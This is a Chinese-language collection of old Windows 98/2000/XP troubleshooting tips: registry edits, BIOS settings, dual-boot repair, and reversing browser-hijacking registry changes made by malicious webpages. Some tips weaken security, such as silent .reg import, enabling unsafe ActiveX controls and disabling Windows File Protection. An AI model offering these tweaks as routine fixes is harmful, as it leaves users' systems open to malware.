    答：有的软件安装需要Windows Installer支持，一般解决方法为：点击“开始→程序→管理工具→服务”，找到Windows Installer服务，将属性打开，将启动类型改为手动，然后启动即可。记住在安装好程序后将此服务停止。如果仍然存在问题，请到微软站点下载最新的Windows Installer 2.0版。如果问题仍然存在，按如下步骤检查：①是否具有管理员的权限。②安装文件是单线程的，查看正在运行的进程，如果里面有ikernel.exe，则表示现在无法安装，结束此进程，然后再安装就OK了。③删除Program Files\Common Files\InstallShield\Engine文件夹，然后重新运行安装程序。


解决插电即开机问题

《一键清理系统垃圾》

解决插电即开机问题

    现象：有些朋友有关机后断开电源板电源的习惯，可是却常常被一个问题困扰，就是电源板一通电，计算机就自动开机了，Power键形同虚设。

    解决：有些主板在BIOS设置的“Power Management Setup”中，有一个选项 “Pwron After PW-Fail”，它的默认设置为“ON”，将它设置为“OFF”，下一次再通电时就不会自动开机了。如果没有这个选项，可以把电源管理中的ACPI功能关闭之后再次打开，如果本来就是关闭的，打开它即可。

    大多数主板在BIOS中有一个选项：即在POWER MANAGEMENT SETUP(电源管理设置)中可以选择在意外断电后重新来电时机器的状态，是自动开机或是保持关机状态还是保持断电前的状态。请把自动开机设为Off。

此外，电源或主板质量不佳也可能导致类似问题出现。ATX主板的启动需要检测一个电容的电平信号。如果在接通电源的时候不能保证一次接通良好，就会产生一个瞬间的冲击电流，可能使电源误认为是开机信号，从而导致误开机。


解决窗口按钮上乱码问题

《一键清理系统垃圾》

解决窗口按钮上乱码问题

    问：我有一台电脑，操作系统是Win98第二版，现在不知是什么原因，窗口上的最小化、最大化和关闭按钮，还有菜单上的向下或向右的箭头全都成了乱码，我想问一下到底是哪个文件出了问题？

    答：在Win98中，Marlett是一个系统字体文件，窗口的最小化、最大化等按钮，就是用它来显示的。从你描述的情况可以看出，这个字体文件已经被破坏或被删除。你只要到安装了Win98第二版的机器上拷贝一个好的Marlett字体文件，然后再将它拷贝到自己系统的Windows\fonts目录下(都要在DOS状态下进行)就行了。如果本机上的Marlett.ttf文件存在但被破坏，那么先要去掉原来字体文件的隐藏属性，这样才能覆盖它。如果对DOS操作不熟悉，可以使用The Font Thing(下载地址：http://www.onlinedown.net/thefont.htm)之类软件在Windows下进行字体的拷贝和安装。


注册表文件不出现确认对话框

《一键清理系统垃圾》

注册表文件不出现确认对话框

  去掉导入注册文件时弹出的对话框，只要打开注册表编辑器，展开到HKEY_CLASSES_ROOT\regfile\shell\open\command，将右边名称为“默认”的数据 regedit.exe "1" 改为 regedit.exe /s "1" 即可。如果想恢复的话，只要去掉“/s”即可。


多系统安装

《一键清理系统垃圾》

多系统安装

首先在BIOS中设置系统启动顺序为“光盘优先启动”，然后把Win98安装光盘放入光驱，启动电脑进行安装。在“选择Windows 98的安装目录”窗口上选择“其他目录”，并指定为“E:\WINDOWS”，然后按常规方法完成安装。

    恢复多系统启动菜单

当你安装完Win98后，重新启动电脑，是不是发现我们熟悉的多系统启动菜单并没有出现，致使Win2000和WinXP都无法启动了，这如何是好？不要着急，下面我们就一步一步来恢复多系统启动菜单。

①首先在BIOS中设置系统启动顺序为“光盘优先启动”，然后将Win2000安装光盘放入光驱，进入安装画面，这时有三个选项可供选择，按“R”进入修复项。

②“Windows 2000修复选项”中提供了两个选项，再次按“R”键选择“用紧急修复过程修复Windows 2000”，出现“手工修复”和“快速修复”两个选择项，选择“手工修复”。

③接下来进入“选择修复任务”窗口，点击“[X] 验证Windows 2000系统文件”选项，再点击“继续（执行所选任务）”，开始修复启动扇区。

④这时，Windows 2000安装修复程序会询问你是否有紧急修复软盘。因为我们不需要修复软盘，所以按“L”键让安装程序自动查找Windows 2000不能启动的原因。Windows 2000修复程序找到需要恢复的Windows 2000，按下回车键进行恢复。这时，修复程序会自动检查磁盘、引导扇区，然后设置启动菜单，这样，不但找回不能启动的Win2000，而且还能把Win98自动加入启动菜单中。

⑤虽然启动菜单中有了Win2000和Win98，但WinXP依旧还是没有恢复，不用着急！进入Windows2000，把Windows XP安装光盘放入光驱，然后进入光盘的i386目录，可以找到ntldr和Ntdetect.com两个文件，把它们拷贝到C:\下，这时候多系统菜单就恢复了，WinXP也可以进入了。但你会发现多系统启动菜单居然变成了英文的了，这个时候我们可以到C:盘根目录下打开一个Boot.ini文件，只要编辑一下里面的内容即可。


回收站无法清空

《一键清理系统垃圾》

回收站无法清空

    问：我的系统是Windows XP，我从F盘中删除了一个名为“dvdregionfree3031”的文件后，系统出现问题，表现为回收站中的内容无法清空，而且每次打开回收站时它总先搜索一遍，然后在清空回收站时显示一个确认删除对话框，选“是”后清空，再次打开回收站时又出现了上述情况，请问我该怎么办？

    答：启动到带命令行的安全模式下，然后对每一个分区下的Recycled目录执行Attrib -s -r -h命令去除特殊属性，然后使用Del命令删除每一个分区下的Recycled目录。操作完毕后重新启动进入正常模式，问题一般即能解决。


解决活动窗口按钮被改写

《一键清理系统垃圾》

解决活动窗口按钮被改写

电脑中缺少了“Marlett”字体。

你可以在其他电脑中复制该字体到自己电脑的“控制面板---字体”中，也可以使用安装盘在“文件---安装新字体”中安装该字体。


操作系统停止响应

《一键清理系统垃圾》

操作系统停止响应

    海南读者李俊来信：我用的是Win 98和Win XP双操作系统。多数时候用Win XP，Win XP在关机或重启时，好些时候它总停在“正在保存系统设置”处，硬盘的灯不再闪烁，系统就不响应了！这是什么原因呢？

    A：启动和关闭计算机时系统总是提示：“正在保存系统设置”，这主要是因为系统运行后加载的文件太多了，导致系统在短时间内运行太多的文件而不能中止，我们可以用“Ctrl+Alt+Del”键调出“Windows任务管理器”，单击“进程”就可以查看当前运行的文件。要解决此类问题，在“开始→运行”中键入“Msconfig”命令，在弹出的“系统配置实用程序”对话框，单击“启动”标签项，这里都是随着系统启动的一些程序，在此将一些不常用程序前面的钩去掉即可。另外，硬盘上的碎片过多也会导致系统关机或重启时间过长甚至造成死机现象，所以我们还要定期对硬盘进行碎片扫描。如果你在关机或注销时设置了声音文件，如果此声音文件破坏也会导致出现这类问题，我们可以到“控制面板→声音和音频设置”中将声音去掉。如果问题仍未解决，我们可以右键点击“我的电脑”，选择“管理”，并在“服务和应用”项中选择“服务”项目，在右侧的窗口中将不必要的服务停用，注意停用前一定要仔细阅读当前服务的文字说明。


解决开机ESCD错误

《一键清理系统垃圾》

解决开机ESCD错误

问：我的电脑在开机的时候，屏幕显示出一段英文提示，大致意思是ESCD写入出现了错误，请问这会不会影响系统正常使用？

答：系统在启动时需要对即插即用设备及非即插即用设备进行自检，然后写入BIOS。出现“ESCD 写入”的错误，可能的原因一是主板BIOS的防改写跳线被选择，这时BIOS数据就无法改写。另一个可能是主板的BIOS芯片造成的，如果BIOS芯片有损坏的话，可能会造成信息不能完全写入。这种现象对系统正常使用没有什么大的影响，你可以不必理会。


开始菜单响应速度过慢

《一键清理系统垃圾》

开始菜单响应速度过慢

    问：我每次单击Windows的开始菜时，弹出下一组菜单都非常慢，可是以前单击开始菜单时却很快，我想问问用什么方法可以调节开始菜单的弹出速度？

    答：开始菜单的弹出速度是可以控制的，我们可以在控制面板中对它进行修改：打开注册表编辑器，依次展开HKEY_CURRENT_USER\ControlPanel\desktop分支，然后在此创建一个DWORD值，并将它命名为“Menushowdelay”，你可以将该键的键值设为0至0100000之间的值，这个值就是显示菜单延长时间的值，单位为MS，输入后重启计算机即可生效。


解决控件提示问题

《一键清理系统垃圾》

解决控件提示问题

    Q：我在用OE脱机浏览邮件时，总是出现这样的警告信息：“该页上的ActiveX控件不安全，当前安全设置禁止运行该页上的不安全控件，因此，可能无法正确显示该页”。“安全设置”中我设置的是“中”，即使调到低也是同样的情况，请问这是为什么，如何避免？

    A：这是因为OE(IE)中对Internet上Web页面的安全设置出现的一个提示信息。在“选项”的“安全设置”中，选定为“中”级时，“对没有标记为安全的ActiveX控件进行初始化和脚本运行”设为“禁用”；选定为“低”级时，则设为“提示”。这样，当浏览Web页面的邮件时，就会出现无法显示(“禁用”时)或不安全的提示(“提示”时)。如若我们确实需要浏览该Web页面的邮件时，可在OE(或IE)“选项”的“安全设置”中，选定为“自定义级别”，对“对没有标记为安全的ActiveX控件进行初始化和脚本运行”设为“启用”即可。为防不测，在浏览时要开启病毒监控。 (重庆 孙先华)


解决某些网页不能访问

《一键清理系统垃圾》

解决某些网页不能访问

问：我单位有一个小型局域网，安装了ADSL共享上网，速度很快，可是存在一个很麻烦的问题，就是某些网站常常无法正常访问(比如新浪网站)，请问如何解决？

答：如果使用ADSL时某些网页上不去，可能是因为网络的MTU值不匹配的缘故。“MTU”是“Maximum Transfer Unit”(最大传输单元)的英文缩写。MTU定义了基于TCP/IP协议在网络中传输的每一个数据包所含的字节数，修改MTU值的参数可以提高网络访问的速度。操作系统对MTU有一个默认值，但并不是最优化的设置，如果使用者不满意的话，可以自己调整这项参数的设置。

具体方法：一是在Win98系统中选择“网络”选项中的“拨号网络适配器”，然后单击“属性”，在新出现窗口中再选中“高级”选项，里面有一个“IP包大小”的选项，用户可以自己调整其中的大小级别。第二种方法是运行REGEDIT程序，找到注册表中的HKEY_LOCAL_MACHINE\Enum\Root\Net选项，修改其中的MTU数值，当然也可以使用专门的软件，比如MTU Speed Pro来修改这一数值。


任务栏的图标变大了

《一键清理系统垃圾》

任务栏的图标变大了

    问：近日，不知执行了什么操作，任务栏上的图标变得和桌面上的一样大，虽然不影响使用，但看起来非常不美观。请问怎样才能让它恢复原样呢？

    答：运行regedit.exe打开注册表编辑器，找到HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics，在右边的窗口中找到字符串值：“Shell Icon Size”，改变其值就可以改变图标的大小。一般是“32”这个数值。注意修改注册表前请事先备份注册表。


解决“添加删除程序”里面隐藏问题

《一键清理系统垃圾》

解决“添加删除程序”里面隐藏问题

在C:\Windows\Inf下找到Sysoc.inf文件，用记事本程序打开它，该文件显示了当前已安装程序的部分列表。我们拿MSN Messenger来做个实验，在其中找到这一句“msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7”，其中“msmsgs”是MSN Messenger的条目名，“hide”这个参数就是控制着程序是否在“添加/删除程序”中显示，我们只要把它删除，变为“msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7”，然后重新启动电脑，再次到“添加/删除程序”中，就会看到MSN Messenger了。
    根据这个道理，可以把Sysoc.inf文件中包含的“hide”全部删除，这样那些被隐藏的组件就都会在“添加/删除程序”中全部显示出来了。


win98图标老乱套，与文件类型不配，

《一键清理系统垃圾》

win98图标老乱套，与文件类型不配，

1、在安全模式下运行grpconv（在Windonws目录下）试试；

2、在安全模式下删了ShellIconCache文件（在Windonws目录下，是隐藏文件）然后重启。

这是由于Windows的图标缓冲文件被破坏了，启动“资源管理器”程序，然后进入Windows系统文件夹，找到一个名为ShellIconCache的文件，并将它删除。再重新启动Windows，Windows就会重建图标缓冲文件，桌面上的图标就会恢复原状。由于这个文件是隐藏文件，所以大家可以通过Windows查找功能来找到它。当然我们也可以通过“文件夹选项”来显示隐藏文件，找到后将它删除。


网页恶意代码的十一大危害及其解决方案

《一键清理系统垃圾》

网页恶意代码的十一大危害及其解决方案

（一）如何在注册表被锁定的情况下修复注册表
   注册表被锁定这一招是比较恶毒的，它使普遍用户即使会简单修改注册表使其恢复的条件下，困难又多了一层。症状是在开始菜单中点击“运行”，在运行框中输入regedit命令时，注册表不能够使用，并发现系统提示你没有权限运行该程序，然后让你联系系统管理员。

    这是由于注册表编辑器：

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值“DisableRegistryTools”被修改为“1”的缘故，将其键值恢复为“0”即可恢复注册表的使用。

   解决办法:

  （1）可以自己动手制作一个解除注册表锁定的工具，就是用记事本编辑一个任意名字的.reg文件，比如recover.reg，内容如下：
   REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

  要特别注意的是：如果你用这个方法制作解除注册表锁定的工具，一定要严格按照上面的书写格式进行，不能遗漏更不能修改（其实你只需将上述内容“复制”、“粘贴”到你机器记事本中即可）；完成上述工作后，点击记事本的文件菜单中的“另存为”项，文件名可以随意，但文件扩展名必须为.reg（切记）,然后点击“保存”。这样一个注册表解锁工具就制作完成了，之后你只须双击生成的工具图标，其会提示你是否将这个信息添加进注册表，你要点击“是”，随后系统提示信息已成功输入注册表，再点击“确定”即可将注册表解锁了。

   (2)也可以直接下载下面这个解锁工具，下载完成运行后可直接解锁注册表编辑器：

               http://it.rising.com.cn/antivirus/net_virus/spiteful/enable.reg

（二）篡改IE的默认页

   有些IE被改了起始页后，即使设置了“使用默认页”仍然无效，这是因为IE起始页的默认页也被篡改了。具体说就是以下注册表项被修改：

    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL

  “Default_Page_URL”这个子键的键值即起始页的默认页。

    解决办法：

    运行注册表编辑器，然后展开上述子键，将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就行了，或者将其设置为IE的默认值。

（三）修改IE浏览器缺省主页，并且锁定设置项，禁止用户更改

   主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选)：

   HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
   "Settings"=dword:1

   HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
    "Links"=dword:1

   HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
    "SecAddSites"=dword:1

   解决办法：

   将上面这些DWORD值改为“0”即可恢复功能。

（四）IE的默认首页灰色按扭不可选

       这是由于注册表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel

    下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”，被修改后为“1”（即为灰色不可选状态）。

    解决办法：

    将“homepage”的键值改为“0”即可。

（五）IE标题栏被修改

     在系统默认状态下，是由应用程序本身来提供标题栏的信息，但也允许用户自行在上述注册表项目中填加信息，而一些恶意的网站正是利用了这一点来得逞的：它们将串值Window Title下的键值改为其网站名或更多的广告信息，从而达到改变浏览者IE标题栏的目的。

    具体说来受到更改的注册表项目为：

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title

   HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

    解决办法：

    ①在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；

    ②展开注册表到

   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，在右半部分窗口中找到串值“Window Title” ，将该串值删除即可，或将Window Title的键值改为“IE浏览器”等你喜欢的名字；

    ③同理，展开注册表到

   HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

    然后按②中所述方法处理。

    ④退出注册表编辑器，重新启动计算机，运行IE，你会发现困扰你的问题被解决了！

（六）IE右键菜单被修改
  受到修改的注册表项目为：

   HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

   下被新建了网页的广告信息，并由此在IE右键菜单中出现！

   解决办法：

   打开注册标编辑器，找到

   HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

   删除相关的广告条文即可，注意不要把下载软件FlashGet和Netants也删除掉，这两个可是“正常”的，除非你不想在IE的右键菜单中见到它们。

（七）IE默认搜索引擎被修改

    在IE浏览器的工具栏中有一个搜索引擎的工具按钮，可以实现网络搜索，被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。出现这种现象的原因是以下注册表被修改：

    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch

    HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant

    解决办法：

    运行注册表编辑器，依次展开上述子键，将“CustomizeSearch”和“SearchAssistant”的键值改为某个搜索引擎的网址即可。

（八）系统启动时弹出对话框

    受到更改的注册表项目为：

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

    在其下被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”，其中“LegalNoticeCaption”是提示框的标题，“LegalNoticeText”是提示框的文本内容。由于它们的存在，就使得我们每次登陆到Windwos桌面前都出现一个提示窗口，显示那些网页的广告信息！

    解决办法：

    打开注册表编辑器，找到

    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon

    这一个主键，然后在右边窗口中找到“LegalNoticeCaption”和“LegalNoticeText”这两个字符串，删除这两个字符串就可以解决在登陆时出现提示框的现象了。

（九）IE默认连接首页被修改

     IE浏览器上方的标题栏被改成“欢迎访问……网站”的样式，这是最常见的篡改手段，受害者众多。

  受到更改的注册表项目为：

  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page

  HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

     通过修改“Start Page”的键值，来达到修改浏览者IE默认连接首页的目的，如浏览“万花谷”就会将你的IE默认连接首页修改为“http://on888.home.chinaren.com ”，即便是出于给自己的主页做广告的目的，也显得太霸道了一些，这也是这类网页惹人厌恶的原因。

    解决办法：

    ①在Windows启动后，点击“开始”→“运行”菜单项，在“打开”栏中键入regedit，然后按“确定”键；

    ②展开注册表到
   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下，在右半部分窗口中找到串值“Start Page”双击 ，将Start Page的键值改为“about:blank”即可；

    ③同理，展开注册表到
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
    在右半部分窗口中找到串值“Start Page”，然后按②中所述方法处理。

    ④退出注册表编辑器，重新启动计算机，一切OK了！

    特殊例子：当IE的起始页变成了某些网址后，就算你通过选项设置修改好了，重启以后又会变成他们的网址啦，十分的难缠。其实他们是在你机器里加了一个自运行程序，它会在系统启动时将你的IE起始页设成他们的网站。

    解决办法：运行注册表编辑器regedit.exe，然后依次展开
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run

    主键，然后将其下的registry.exe子键删除，然后删除自运行程序c:\Program Files\registry.exe，最后从IE选项中重新设置起始页。

（十）IE中鼠标右键失效

      浏览网页后在IE中鼠标右键失效，点击右键没有任何反应！

    有的网络流氓为了达到其恶意宣传的目的，将你的右键弹出的功能菜单进行了修改，并且加入了一些乱七八糟的东西，甚至为了禁止你下载，将IE窗口中单击右键的功能都屏蔽掉。

解决办法：

    1.右键菜单被修改。打开注册表编辑器，找到HKEY_CURRENT_USER＼Software＼Microsoft＼Internet Explorer＼MenuExt，删除相关的广告条文。

2.右键功能失效。打开注册表编辑器，展开到HKEY_CURRENT_USER＼Software＼Policies＼Microsoft＼Internet Explorer＼Restrictions，将其DWORD值"NoBrowserContextMenu"的值改为0。

（十一）查看“源文件”菜单被禁用

       在IE窗口中点击“查看”→“源文件”，发现“源文件”菜单已经被禁用。

    恶意网页修改了注册表，具体的位置为：

    在注册表
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer

    下建立子键“Restrictions”，然后在“Restrictions”下面建立两个DWORD值：

“NoViewSource”和“NoBrowserContextMenu”，并为这两个DWORD值赋值为“1”。

    在注册表
   HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
  下，将两个DWORD值：“NoViewSource”和“NoBrowserContextMenu”的键值都改为了“1”。

    通过上面这些键值的修改就达到了在IE中使鼠标右键失效，使“查看”菜单中的“源文件”被禁用的目的。

    解决办法：

    将以下内容另存为后缀名为.reg的注册表文件，比如说unlock.reg，双击unlock.reg导入注册表，不用重启电脑，重新运行IE就会发现IE的功能恢复正常了。

    REGEDIT4

    HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions

   “NoViewSource”=dword:00000000

    "NoBrowserContextMenu"=dword:00000000

    HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions

    “NoViewSource”=dword:00000000

    “NoBrowserContextMenu”=dword:00000000


找回Administrator账户密码

《一键清理系统垃圾》

找回Administrator账户密码

    广西读者CJY来信：我的WinXP安装在NTFS分区上。在使用故障修复控制台时，程序要求我输入Administrator的密码，可我已经不记得密码了(安装WinXP时，设置密码了)。请问有什么方法可以帮我找回密码吗？

    答：可以找回Administrator的密码。①若能正常进入WinXP，则使用具有管理员权限的账户登录WinXP，然后打开“控制面板→管理工具→计算机管理”(也可以在“运行”里输入compmgmt.msc打开计算机管理)，在右边“计算机管理(本地)”的树形列表中选择“本地用户和组→用户”，在右边就可以看到当前系统里面存在的全部账户。用鼠标右键点击Administrator，选择设置密码，然后按照屏幕提示操作即可重新设置密码。②若无法正常进入WinXP，如果可以使用命令行安全模式，那么用具有管理权限的账户登录，使用NET USER命令修改密码，格式为“NET USER Administrator <输入你的新密码>”，然后回车即可。如果连命令行安全模式都无法进入，那么只有使用安装光盘选择修复了(用安装光盘启动系统，在安装程序选择菜单上选择“现在开始安装WinXP”，然后选择“修复”开始修复程序)。修复过程类似于Win98的覆盖安装，修复中会要求重新创建密码，而且已经安装的软件仍然可以继续使用。


"文件保护"的解决方法

《一键清理系统垃圾》

"文件保护"的解决方法

这可能是因为你先前删除了一些文件而导致的，只要在组策略中进行一下设置即可：单击“开始→运行”，输入“gpedit.msc”，然后依次展开“计算机配置→管理模板→系统→Windows文件保护”，然后双击“设置文件保护扫描”并将其设置为“禁用”即可。
我按以下步骤关闭文件保护
1、点击开始-->运行，键入regedt32并回车；
2、找到[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]；
3、在右侧的窗格中右键单击选择New-->DWORD Value，为其命名为SFCDisable；
4、在Hexadecimal项下输入键值为ffffff9d以关闭WFP；
5、重新启动系统使所做的更改生效
但是进行到第三步时就发现右侧的窗格里没有new这个选项，进行不下去了！
描述：
    该设置可以控制是否要系统开启文件保护功能即 (SFC) 它可以监视Windows的系统文件每当系统启动时候。我们可以修改注册表自由的控制文件的扫描参数。
操作：

打开你的“注册表编辑器”。然后找到[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]这个子键。在右侧的窗口中创建一个“双字节值”并命名为“SFCScan”然后修改其值为 0 = 禁用, 1 = 启动时扫描, 2 = 扫描一次。
退出“注册表编辑器”注销或重新启动计算机，你会看到更改后的效果。
Windows XP和2000包括一种叫做WFP（Windows File Protection，Windows文件保护）的技术。把"SFCDisable"键的键值设置为"ffffff9d"可禁用WFP，而设置为"0"则可以启用它。其它一些可用的键值如下：
1 - 禁用，但是在系统启动的时候会询问你是否重新启用
2 - 只在下一次重启动的时候禁用，也不会询问你是否重新启用
4 - 启用，并且，不显示弹出窗口
ffffff9d - 完全禁用
还原受保护的Windows系统文件：在运行对话框中输入"Sfc /scannow"然后点击OK

用sfc /quiet把wfc屏蔽掉就Ok了
扫描工具SFC

    此工具会自动扫描所有受保护的系统文件，并用正确的版本取代不正确的版本。在操作系统部分损坏时，可以用来恢复系统。

    SFC的命令行及其各参数如下：
    SFC [/scannow] [/scanonce] [/scanboot] [/cancel] [/enable]
[/purgecache] [/cachesize=x] [/quiet]
    /SCANNOW：立即扫描所有设置保护的系统文件。
    /SCANONCE：下次开机时，只扫描一次所有设置保护的系统文件。
    /SCANBOOT：每次启动时，扫描所有设置保护的系统文件。
    /CANCEL：取消所有搁置中的设置保护系统文件的扫描。
    /QUIET：不提示用户，直接取代所有不正确的文件版本。
    /ENABLE：启用Windows文件保护，方便一般操作。
    /PURGECACHE：删除文件缓存，并立即扫描所有设有保护的文件系统。
    /CACHESIZE=x：设定文件缓存大小。


双击无法打开文件夹

《一键清理系统垃圾》

双击无法打开文件夹

    问：我的电脑出了问题，在资源浏览器或者我的电脑里面无法打开文件夹，双击鼠标不是打开文件夹而是进入了搜索界面，请问这是为什么？

    答：可以修改注册表来恢复，进入注册表的HKEY_CLASSES_ROOT\Directory\shell，把find删除。还有一个方法就是点“文件夹”的“高级”选项里的“新建”，在“操作”里输入“OpenNew”，接着再在“用于执行操作的应用程序”里输入“Explorer %1”就行了。如果删除find，那不用配置。如果新建OpenNew，那还需把“Opennew”设为默认。


解决无法关机问题

《一键清理系统垃圾》

解决无法关机问题

    1.点“开始→设置→控制面板→电源选项→高级电源管理”，如果你的机器支持高级电源管理功能，则选中“启用高级电源管理支持”；

    2.单击“开始”，并运行“regedit”，然后在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon中找到PowerdownAfterShutdown，并将值设为1；

    3.重启便可成功。

    说明：如果你的机器不支持高级电源管理，实则很不幸，只能在关闭系统显示出“现在可以安全关机”时，辛苦你手动切断电源了。

另：妙法解决Win98/Me不能关机

Win 98和Win Me都存在这样的问题：当系统用上一段时间后，关闭系统时会停留在“现在可以正常关闭系统”这个画面，只有手动按下机箱的Power键才可把系统关闭。关于这个问题，很多报刊都曾经提供了相关的解决办法，概括起来有以下几种：安装微软的关机补丁、检查有没有打开高级电源选项、检查关机音效文件是否损坏。但经笔者多次实验证明，当出现这种情况时用这些方法均不一定奏效。

笔者原来的解决方法是用Ghost将系统还原，后来摸索出了下面的方法，简单实用，现整理成文。

1.新建一个文本文件，然后将此文件改名为“win386.swp”。在接下来的操作中就是要用这个0字节的“win386.swp”文件替换掉系统产生的“win386.swp”文件。

2.依次按“开始→运行”，在“打开”对话框中输入“sfc”运行“系统文件检查器”，点选“从安装软盘提取一个文件”选项，按“浏览”按钮，把刚才新建的“win386.swp”文件选中，按“开始”按钮，此时会出现“文件提取”对话框，在“还原自”那里输入“win386.swp”文件所在的目录，如“C:\”，或者按右侧的“浏览”来选择；在“将文件保存到”那里直接输入“系统盘符\windows”(也可按右侧的“浏览”按钮选择)；两处都填好后，按下“确定”按钮，便开始将新建的“win386.swp”文件替换系统本身的“win386.swp”文件。在这个过程中会出现“是否备份原先win386.swp文件”的提示，按“跳过”按钮即可。最后当弹出要求重启机器的对话框时按“是”，重启电脑后就可正常关机了。

如果按照以上方法操作后故障没有排除，则请首先排除关机音效文件损坏等等因素。如果仍然不能解决，那么请在开机时按“F8”键，在启动菜单中选用“安全模式”启动，然后再重启一次系统就可以了。

其实，如果对DOS熟练的朋友，也可以在纯DOS中删除“win386.swp”文件。即在关闭系统时选“重新启动系统并切换到MS-DOS方式”，将系统切换到纯DOS模式下，然后进入到“windows”目录，执行“del win386.swp”，最后重启电脑即可。


无法升级更新

《一键清理系统垃圾》

无法升级更新

    问：我的系统出了问题，无法安装微软的更新程序，提示“Setup could not verify the integrity of the file Update.inf. Make sure the Cryptographic service is running on this computer”等信息，请问我该如何解决这个问题？

    答：删除C:\Windows\System32\CATROOT2 文件夹，然后重新安装更新程序。


系统无法自动保存设置

《一键清理系统垃圾》

系统无法自动保存设置

    问：我用的是Windows 2000系统，以前我每次退出系统的时候，系统都会对我的一些设置作自动保存，可是现在不知道什么原因，我退出系统的时候不再自动保存设置了，请问我该如何恢复它的自动保存功能？

    答：打开注册表表编辑器，删除HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下面的NoSaveSettings键值，然后重启系统即可。


解决系统声音不正常

《一键清理系统垃圾》

解决系统声音不正常

    问：我的电脑为什么在玩网络游戏如(疯狂坦克，轩辕剑)中间会没声音，有时声音自己会回来，有时一直没有，退出游戏电脑还是没声音，但是重启后声音又会有。我的电脑安装的是Windows 98，磐正845PE主板，集成AC'97声卡。

    答：请重新安装最新版本的声卡驱动和DirectX。由于集成的声卡是使用CPU来处理声音，当CPU高负荷运转时，就可能无法做出响应，导致没有声音。


解决系统托盘区的图标丢失

《一键清理系统垃圾》

解决系统托盘区的图标丢失

    现象：有时当某个程序出现非法操作后，系统托盘区的输入法图标、时间控制图标、音量控制图标都不见了。你无法判断现在的输入法是什么，甚至无法再调节音量，怎么办？

    解答：我们可以通过以下的方法“找回”这些图标：

    1.输入法图标：从“控制面板”下打开“输入法属性”窗口，在“输入法”标签页下勾选“启动任务栏上的指示器”复选项即可。

    2.音量控制图标：从“控制面板”中打开“声音和音频设备属性”窗口，然后勾选“将音量图标放入任务栏”复选框就行了。

    3.任务栏丢失：打开注册表编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer下的StuckRects子键，将它删除后重新启动计算机就可以了。


解决系统资源不足问题

《一键清理系统垃圾》

解决系统资源不足问题

第一种思路：
    1.清除“剪贴板”
    当“剪贴板”中存放的是一幅图画或大段文本时，会占用较多内存。请清除“剪贴板”中的内容，释放它占用的系统资源：单击“开始”，指向“程序”，指向“附件”，指向“系统工具”，单击“剪贴板查看程序”，然后在“编辑”菜单上，单击“删除”命令。

    2.重新启动计算机
    只退出程序，并不重新启动计算机，程序可能无法将占用的资源归还给系统。请重新启动计算机以释放系统资源。

    3.减少自动运行的程序
    如果在启动Windows时自动运行的程序太多，那么，即使重新启动计算机，也将没有足够的系统资源用于运行其他程序。设置Windows不启动过多程序：其一，单击“开始→运行”，键入“msconfig”，单击“确定”按钮，单击“启动”选卡，清除不需要自启动的程序前的复选框。其二，单击“开始→运行”，键入“sysedit”，单击“确定”按钮，删除“autoexec.bat”、“win.ini”和“config.sys”文件中不必要的自启动的程序行。然后，重新启动计算机。

    4.设置虚拟内存
    虚拟内存不足也会造成系统运行错误.可以在“系统属性”对话框中手动配置虚拟内存，把虚拟内存的默认位置转到可用空间大的其他磁盘分区。

    5.应用程序存在Bug或毁坏
    有些应用程序设计上存在Bug或者已被毁坏，运行时就可能与Windows发生冲突或争夺资源，造成系统资源不足。解决方法有二：一是升级问题软件，二是将此软件卸载，改装其他同类软件。

    6.内存优化软件
